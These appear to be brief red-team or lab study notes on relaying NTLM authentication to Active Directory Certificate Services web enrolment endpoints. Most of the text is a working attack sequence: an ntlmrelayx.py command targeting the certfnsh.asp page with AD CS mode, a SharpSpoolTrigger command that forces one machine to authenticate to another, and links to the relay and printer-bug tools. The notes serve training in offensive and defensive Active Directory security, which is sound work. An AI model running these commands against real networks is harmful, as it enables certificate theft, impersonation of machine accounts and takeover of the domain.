NTLM Relaying to ADCS endpoints

AD CS services support HTTP enrolment methods and even includes a GUI.

This endpoint is usually found at http[s]:///certsrv

https://dc-2.dev.cyberbotic.io/certsrv

Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation.

The ntlmrelayx command needs to target the certfnsh.asp page on the ADCS server

sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

Then force the authentication to occur from WEB to WKSTN-2

SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

(can also be done with printerbug.py)

Tooling

• https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

• https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/printerbug.py